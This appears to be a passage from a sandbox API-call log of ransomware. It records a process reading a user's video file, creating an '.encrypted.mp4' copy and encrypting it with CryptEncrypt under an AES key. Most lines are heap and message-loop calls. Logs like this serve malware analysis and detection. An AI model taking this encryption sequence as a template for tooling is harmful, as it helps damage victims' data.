[0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0041.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0041.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0041.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.870] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.encrypted.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.encrypted.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.873] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.873] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0041.876] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3c5f, lpOverlapped=0x0) returned 1 [0041.876] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.879] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13c5f) returned 0xac2018 [0041.879] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.879] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.879] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.880] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.880] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.880] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.880] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.880] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.881] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.881] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.881] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.881] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.881] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.881] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.881] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.881] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.882] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.882] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.882] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.882] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.883] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x13c5f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13c60) returned 1 [0041.883] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 